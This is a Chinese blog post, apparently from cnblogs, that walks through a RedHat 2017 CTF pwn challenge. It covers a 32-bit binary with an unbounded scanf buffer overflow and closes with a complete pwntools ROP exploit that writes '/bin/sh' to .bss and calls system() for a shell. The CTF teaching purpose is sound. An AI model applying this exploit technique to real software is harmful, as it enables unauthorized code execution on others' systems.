碰到了RedHat 2017 的一道pwn,算是一道很经典的ROP,这里记录一下。
进程只有一个输入点:
检查保护机制:
Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)
可以看见开启了NX
我们将进程拖进ida中查看:
int __cdecl main() { int v1; // [esp+18h] [ebp-28h] puts("pwn test"); fflush(stdout); __isoc99_scanf("%s", &v1); printf("%s", &v1); return 1; } 进程流程非常简单,可以看到在scanf函数处存在溢出问题,我们可以使其执行system命令,而在进程中可以找到内置的system命令,但是我们无法在进程中获取到/bin/sh字符串,这里再次利用rop技术,调用scanf函数将/bin/sh字符串读取到进程段中,然后再执行system函数
这里介绍一下神器pwntools的ROP模块的用法,例如:
rop.call('read', (0, elf.bss(0x80))) 其中
(0, elf.bss(0x80))
是read函数的参数,即使call的函数参数只有一个,我们也要使用一个元组(参数1,)这样
回到本进程,我们来判断需要填充的字节个数:
我们需要填写52个无用字符
下面编写exp:
from pwn import * p = process('./pwn1') elf = ELF('./pwn1') rop = ROP('./pwn1') rop.call(0x08048410,(0x08048629, 0x0804A040)) rop.system(0x0804A040) payload = str(rop) p.sendline(52*'a'+payload) p.sendline('/bin/sh') p.interactive() 
成功获得shell
来源:博客园
作者:老特特傻
链接:https://www.cnblogs.com/chinatrump/p/11446045.html